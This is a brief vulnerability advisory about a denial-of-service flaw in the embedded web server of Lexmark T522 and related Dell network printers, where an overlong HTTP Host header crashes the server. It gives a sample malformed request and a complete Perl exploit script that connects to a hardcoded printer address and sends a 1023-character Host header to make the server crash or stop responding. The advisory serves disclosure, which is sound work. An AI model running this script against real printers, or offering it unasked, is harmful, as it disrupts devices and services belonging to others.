|
|
|
|
| |
| Several Lexmark network printers are shipped with a build-in HTTP server for administrative tasks. The web server software is vulnerable to a Denial of Service attack that will force the web server to restart and/or stop taking requests. |
| |
Credit:
The information has been provided by Peter Kruse.
|
| |
Vulnerable Systems:
* Lexmark T522 and all which use the specific web server
* Dell network printers that use the same web server
The Server does not handle long HOST arguments in the HTTP Header correctly and therefore causes the server to crash. An example of sending such a request:
GET / HTTP/1.0\r\n /Host:AAAAAA[x1024]
Exploit:
#!/usr/bin/perl
#
# Denial of Service agains Lexmark T522 Network Printer Webserver
# by snakebyte / eric ( http://www.snake-basket.de )
use Socket;
$target = "192.168.0.54";
$port = "80";
$lamecode = "A" x 1023;
$iaddr = inet_aton($target);
$paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n";
$proto = getprotobyname("tcp") || die "getprotobyname: $!\n";
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die "socket: $!\n";
connect(SOCKET, $paddr) || die "connection attempt failed: $!\n";
send(SOCKET, "GET / HTTP/1.0\r\n", 0);
send(SOCKET, "Host: ".$lamecode."\r\n\r\n", 0);
close SOCKET;
|
|
|
|
|
|
|
|
|
|
